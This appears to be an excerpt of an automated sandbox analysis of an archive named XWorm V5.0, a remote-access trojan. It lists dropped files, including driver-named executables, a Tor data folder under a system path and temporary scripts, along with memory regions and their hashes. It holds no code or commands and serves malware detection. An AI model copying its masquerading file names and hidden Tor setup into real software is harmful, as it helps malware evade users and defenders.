SHA256bb4315535a02ab1041c2d9501c79e090e3c1e69ea2eebb564bf9a8bb84bf50fd
SHA512259b16a89d681e84d6590116c85e89556ec009848fbaed4d6c27c4a77630c152d596db172ff95e6c7d79b5c2986252d58bd04f2a963bea75b8a3f1159683c1e9
-
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtFilesize
722KB
MD543141e85e7c36e31b52b22ab94d5e574
SHA1cfd7079a9b268d84b856dc668edbb9ab9ef35312
SHA256ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d
SHA5129119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc
-
C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txtFilesize
14.6MB
MD5deb99479fc69ccd44511fa4c3e46d37f
SHA163dc936c2a084c8e277ac4d9ca71104117f42eea
SHA256086f50c50e93f5d9100d0f4a18b1fe49d144310662a59b839bb951048d7a9b2a
SHA51230ee3491c0ee53c6b9f68a3c01f01919129d832fe8a13a26e3a0b6e6ff385d848ab09a7923105dc8b07d392cb4568ea80169c473c74f181e48ce2a571156dab0
-
C:\Users\Admin\AppData\Local\Temp\Hyfatok.exeFilesize
84KB
MD59095c3e7ce04dd48e72178ebee7cd5c1
SHA1bb21d1cb98b0ebfde2be9079c18152b340b26418
SHA2569a212f20a8b74e3a0662ace826537cff60bd30a20cdb2b4dd43b8c69e5770bc1
SHA512d01706a02e6de418bbacf2a0bd26c4706a66531934fdcdbd582df7403427293b7fe565ccfee7d941d30ec293bf09309c86fb52e2af7908d26f33fcb296f99c5a
-
C:\Users\Admin\AppData\Local\Temp\SetupTCPIP6Driver.exeFilesize
8KB
MD5488bfa6d9fd5c874585daa3f960e6804
SHA1aa8ca3927c318716e14210fc0a3ed70ea483eb23
SHA256a84bfef2ce112366349e3ce8c70e120ec63731535696b405a458e5ccfcdf7f48
SHA512952db3ec6548421b8c013c1482545e005c7526f0c4f432b12bde8460a13c88d0f1022cfe3008af88bb043d9fdede9e341bcc406d7d2fc8370249da75642a07a1
-
C:\Users\Admin\AppData\Local\Temp\SetupTcpipDriver.exeFilesize
28KB
MD52fbe46325e890bee1e21aba30c9345be
SHA12c860d226f6b8f59caa058e39d06d6ae24007227
SHA256cfbd108945d203a6a5ced2dc4eee0084ba66972c1361c05b6b7065276f15eb4b
SHA512133e2c1a9bad1b7a9c7e519c6132a4494af5a0233c47ee3eecae263f72bce8345356f032bbbcdefc934776020b210327f18a52b72138006808975f8bad2ebc34
-
C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exeFilesize
15.9MB
MD55fdd63f4c49da8ae1db37c73c14e3a41
SHA11ba54d6438c1b79d48253b6a6b8a08a517acb895
SHA2566689c1e9f0efb9d7274b6b9b053e4e9c30135d8b3f14533da18d9841865d295f
SHA51266b465c228e381f2ab04c6aed3693fdf9fe402b703eeb58a1bfad2ca6fbdfcb9e0e0c21ced0d021f5e309e95c04833d8925825b5cf044c1333ad4b102c18c654
-
C:\Users\Admin\AppData\Local\Temp\SystemCheck.xmlFilesize
2KB
MD59160347bec74471e1a79edfd950629ae
SHA1c149a7e5aab6e349a70b7b458d0eaaa9d301c790
SHA2560fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab
SHA512b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_shex0zm5.g2b.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\aut9769.tmpFilesize
14.6MB
MD5fa5e03b190c2c37fa0ca1cb548504664
SHA1c1d9715dc2a34c50cca59787bd3f44c6f923a215
SHA25676b898506236480936ce1498d6928f8ac22efb0d8dfa8e7982759211e35e9b36
SHA512518d7866bf5df37382cd0da7b6ca7e1d694db21b987ce4970f76d543df40c0178def4f1d9bba881faf4bc2b107ea32e270bd64b97bcc30917c154d1b12d15987
-
C:\Users\Admin\AppData\Local\Temp\tmpB2C1.tmp.cmdFilesize
163B
MD5675348947859191fe88102f73c585f4e
SHA14dbc9769cdb1e8487d34a2c266592de0ddc3de21
SHA2568a35aaf3cdba459043b8396964fd6721e176cc8bbcaf85bab6877731154fe123
SHA512a32efc3c71ebb919ae65b81cf786466b98cab0579d31a867e5bcaf4dc65beb690cf133041e5a29003d07a670f0048a6140a6f025cd18c5bbacd54fe85d1b0146
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-msFilesize
10KB
MD57bd8984b35d6674b4b6eb8e84265b15d
SHA1735d1ff4e5561541fd92d8efdb4b70ac3e8c3fcf
SHA256a4d7efefe25665a1389e737267938466b3bfe69e88150887746d97ec206be344
SHA51244ef34024d37c36065394234eaa7bc9e99b41c7843fc7ea425bee1be6c043b3e8ec79a4a98a1cbc92ce92f5031a447c559e534add066a2b4129cf0c357e88897
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmpFilesize
13KB
MD5f308388db66a61e9a20b91b7763adfb2
SHA12feb8b5240b569e6f657a71135605dfa29e9189a
SHA2563c4e36a7290fdc7304aa23d9614dfafae3782b21a7bcfdcc51ec97b9311fc355
SHA512368d11c6e980c3d022c3325147c8e4518217316e43d3dfaea52f91e7c315dd4824a92736235809f41f58c2b9cb32f5b892ff8e6340724111134ee1ec98a33faa
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus.tmpFilesize
2.7MB
MD5973d9146f0b73b0e79ebc3513a9a691c
SHA1fd7991dc862eb8a6db1de9443da543ae0431f92f
SHA256660950d4c4fb432fd874b58bdc51c753bbfc1b69ee832f66aa6198576ce796cc
SHA512e64817b3d7b12528e286afc4d0416b1da64816d7bfc5a03caab1f2730c84ebff2ee40b31da619e46886b7d76f0bbb324695632d6dfdcf9cefb34c28a8c5e4c88
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.newFilesize
8.6MB
MD5acf75eeba624bea7f45ccf50095885f6
SHA1613df8855679e11718c9dd9fa52c09f2519f24fd
SHA2561f56acdbd967c245176960c222c85cd3e692bf05131c31f30b770783b82b78a0
SHA5125f8a2eb03abb82c52aa37f8d7737b0e1c770f164052d89eae38ed3ab6322215671251751cef378d16bff07e91cc7354c6a47fc039d19996096b53ef1cac6c82c
-
C:\Users\Admin\Downloads\XWorm_V5.0.zipFilesize
45.1MB
MD58b91eb98b41bcaec582b0ee34d9d7c2b
SHA182a01ac278b53ee1427cffc0b186d92c0be109c6
SHA2567153b57fe407d18f630696e2f9226da12e936131ff51f368506148d1d4676a23
SHA5124d1a06da6475413dc711698cb8e61e2dadd0fafaa84969539f08aa737706a42a1e19e103f7aeac6f23b545ae2e8d1ad0772bfeeb681e40d4b70c4e3d42cd0f53
-
C:\Users\Admin\Downloads\XWorm_V5.0\XWorm V5.0\XWorrnLoader.exeFilesize
101KB
MD539d81ca537ceb52632fbb2e975c3ee2f
SHA10a3814bd3ccea28b144983daab277d72313524e4
SHA25676c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA51218f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
-
memory/2156-282-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/2156-264-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/2548-439-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/2548-232-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/2548-329-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/2548-233-0x0000000000B30000-0x0000000001AE8000-memory.dmpFilesize
15.7MB
-
memory/2548-352-0x0000000002CB0000-0x0000000002CC0000-memory.dmpFilesize
64KB
-
memory/2548-234-0x0000000002CB0000-0x0000000002CC0000-memory.dmpFilesize
64KB
-
memory/3432-461-0x0000000005E00000-0x0000000005E10000-memory.dmpFilesize
64KB
-
memory/3432-299-0x0000000005D10000-0x0000000005D16000-memory.dmpFilesize
24KB
-
memory/3432-278-0x0000000005B20000-0x0000000005BBC000-memory.dmpFilesize
624KB
-
memory/3432-279-0x0000000005AC0000-0x0000000005AE8000-memory.dmpFilesize
160KB
-
memory/3432-355-0x00000000743A0000-0x00000000743A1000-memory.dmpFilesize
4KB
-
memory/3432-274-0x00000000008B0000-0x00000000008CE000-memory.dmpFilesize
120KB
-
memory/3432-280-0x0000000005AA0000-0x0000000005AA6000-memory.dmpFilesize
24KB
-
memory/3432-283-0x0000000005C20000-0x0000000005C7E000-memory.dmpFilesize
376KB
-
memory/3432-286-0x0000000005C80000-0x0000000005CD6000-memory.dmpFilesize
344KB
-
memory/3432-330-0x0000000006090000-0x0000000006122000-memory.dmpFilesize
584KB
-
memory/3432-371-0x00000000078F0000-0x00000000084A6000-memory.dmpFilesize
11.7MB
-
memory/3432-372-0x0000000003040000-0x000000000304A000-memory.dmpFilesize
40KB
-
memory/3432-373-0x0000000008660000-0x00000000086B6000-memory.dmpFilesize
344KB
-
memory/3432-374-0x000000000AD90000-0x000000000AF84000-memory.dmpFilesize
2.0MB
-
memory/3432-294-0x0000000005D00000-0x0000000005D10000-memory.dmpFilesize
64KB
-
memory/3432-328-0x0000000007340000-0x00000000078E4000-memory.dmpFilesize
5.6MB
-
memory/3432-322-0x00000000068C0000-0x0000000007332000-memory.dmpFilesize
10.4MB
-
memory/3432-298-0x0000000005BE0000-0x0000000005BE6000-memory.dmpFilesize
24KB
-
memory/3432-391-0x0000000074C40000-0x00000000753F0000-memory.dmpFilesize
7.7MB
-
memory/3432-320-0x0000000005E00000-0x0000000005E10000-memory.dmpFilesize
64KB
-
memory/3432-393-0x0000000005D00000-0x0000000005D10000-memory.dmpFilesize
64KB
-
memory/3432-394-0x0000000073B9E000-0x0000000073B9F000-memory.dmpFilesize
4KB
-
memory/3432-316-0x0000000005E30000-0x0000000005E40000-memory.dmpFilesize
64KB
-
memory/3432-397-0x0000000005D00000-0x0000000005D10000-memory.dmpFilesize
64KB
-
memory/3432-395-0x000000000DEA0000-0x000000000DF06000-memory.dmpFilesize
408KB
-
memory/3432-277-0x0000000005660000-0x00000000056A2000-memory.dmpFilesize
264KB
-
memory/3432-276-0x0000000074C40000-0x00000000753F0000-memory.dmpFilesize
7.7MB
-
memory/3432-353-0x000000007439F000-0x00000000743A0000-memory.dmpFilesize
4KB
-
memory/3432-304-0x0000000005DE0000-0x0000000005DFA000-memory.dmpFilesize
104KB
-
memory/3432-300-0x0000000005D60000-0x0000000005D9C000-memory.dmpFilesize
240KB
-
memory/3432-437-0x0000000005E30000-0x0000000005E40000-memory.dmpFilesize
64KB
-
memory/3552-246-0x000001FF6BE40000-0x000001FF6BE62000-memory.dmpFilesize
136KB
-
memory/3552-235-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/3552-236-0x000001FF53820000-0x000001FF53830000-memory.dmpFilesize
64KB
-
memory/3552-237-0x000001FF53820000-0x000001FF53830000-memory.dmpFilesize
64KB
-
memory/3552-250-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/3736-423-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/3736-400-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/3736-399-0x000001B5D6530000-0x000001B5D6540000-memory.dmpFilesize
64KB
-
memory/3736-398-0x000001B5D6530000-0x000001B5D6540000-memory.dmpFilesize
64KB
-
memory/3820-491-0x000002A77D650000-0x000002A77D670000-memory.dmpFilesize
128KB
-
memory/3820-484-0x000002A77D240000-0x000002A77D260000-memory.dmpFilesize
128KB
-
memory/3820-486-0x000002A77D200000-0x000002A77D220000-memory.dmpFilesize
128KB
-
memory/4056-623-0x000001B29B160000-0x000001B29B180000-memory.dmpFilesize
128KB
-
memory/4056-621-0x000001B29AD50000-0x000001B29AD70000-memory.dmpFilesize
128KB
-
memory/4056-619-0x000001B29AD90000-0x000001B29ADB0000-memory.dmpFilesize
128KB
-
memory/4256-332-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/4256-302-0x000002265F5C0000-0x000002265F5D0000-memory.dmpFilesize
64KB
-
memory/4256-303-0x000002265F5C0000-0x000002265F5D0000-memory.dmpFilesize
64KB
-
memory/4256-301-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/4456-354-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/4456-351-0x00000000006A0000-0x00000000006BC000-memory.dmpFilesize
112KB
-
memory/4512-440-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/4512-462-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/4512-438-0x0000000000DC0000-0x0000000000DCC000-memory.dmpFilesize
48KB
-
memory/4616-356-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/4616-357-0x000002BCAB070000-0x000002BCAB080000-memory.dmpFilesize
64KB
-
memory/4616-358-0x000002BCAB070000-0x000002BCAB080000-memory.dmpFilesize
64KB
-
memory/4616-376-0x00007FFD72210000-0x00007FFD72CD1000-memory.dmpFilesize
10.8MB
-
memory/4708-1615-0x0000000000210000-0x0000000000671000-memory.dmpFilesize
4.4MB
-
memory/4708-1024-0x0000000000210000-0x0000000000671000-memory.dmpFilesize
4.4MB
-
memory/4708-808-0x0000000059300000-0x00000000593D3000-memory.dmpFilesize
844KB
-
memory/4708-3513-0x0000000000210000-0x0000000000671000-memory.dmpFilesize
4.4MB
-
memory/4708-804-0x0000000059760000-0x0000000059843000-memory.dmpFilesize
908KB
-
memory/4708-803-0x0000000000210000-0x0000000000671000-memory.dmpFilesize
4.4MB
-
memory/4708-3807-0x0000000000210000-0x0000000000671000-memory.dmpFilesize
4.4MB
-
memory/4708-805-0x0000000059700000-0x0000000059754000-memory.dmpFilesize
336KB
-
memory/4708-806-0x0000000059410000-0x00000000596FD000-memory.dmpFilesize
2.9MB
-
memory/4708-807-0x00000000593E0000-0x0000000059403000-memory.dmpFilesize
140KB
-
memory/4708-809-0x0000000059260000-0x00000000592F8000-memory.dmpFilesize
608KB
-
memory/4800-389-0x0000000074C40000-0x00000000753F0000-memory.dmpFilesize
7.7MB
-
memory/4800-390-0x0000000000070000-0x0000000000078000-memory.dmpFilesize
32KB
-
memory/4800-392-0x0000000004960000-0x0000000004970000-memory.dmpFilesize
64KB
-
memory/4900-477-0x0000000004950000-0x0000000004951000-memory.dmpFilesize
4KB
-
memory/5556-606-0x000001FECB8F0000-0x000001FECB910000-memory.dmpFilesize
128KB
-
memory/5556-603-0x000001FECB1E0000-0x000001FECB200000-memory.dmpFilesize
128KB
-
memory/5556-601-0x000001FECB520000-0x000001FECB540000-memory.dmpFilesize
128KB
-
memory/5596-581-0x0000028A8DBE0000-0x0000028A8DC00000-memory.dmpFilesize
128KB
-
memory/5596-577-0x0000028A8D610000-0x0000028A8D630000-memory.dmpFilesize
128KB
-
memory/5596-579-0x0000028A8D5D0000-0x0000028A8D5F0000-memory.dmpFilesize
128KB
-
memory/5636-530-0x000001F9ACDE0000-0x000001F9ACE00000-memory.dmpFilesize
128KB
-
memory/5636-527-0x000001F9AC7D0000-0x000001F9AC7F0000-memory.dmpFilesize
128KB
-
memory/5636-525-0x000001F9ACA20000-0x000001F9ACA40000-memory.dmpFilesize
128KB
-
memory/5884-506-0x000002F2C0660000-0x000002F2C0680000-memory.dmpFilesize
128KB
-
memory/5884-508-0x000002F2C0620000-0x000002F2C0640000-memory.dmpFilesize
128KB
-
memory/5884-510-0x000002F2C0A30000-0x000002F2C0A50000-memory.dmpFilesize
128KB
-
memory/6196-723-0x0000012099450000-0x0000012099573000-memory.dmpFilesize
1.1MB
-
memory/6196-721-0x0000012099450000-0x0000012099573000-memory.dmpFilesize
1.1MB
-
memory/8164-3798-0x000001D614890000-0x000001D6149B3000-memory.dmpFilesize
1.1MB
-
memory/8164-3800-0x000001D614890000-0x000001D6149B3000-memory.dmpFilesize
1.1MB
-
memory/8692-3816-0x0000015014730000-0x0000015015241000-memory.dmpFilesize
11.1MB
-
memory/8692-3818-0x0000015014730000-0x0000015015241000-memory.dmpFilesize
11.1MB
-
memory/8692-3819-0x00000150154C0000-0x00000150154E0000-memory.dmpFilesize
128KB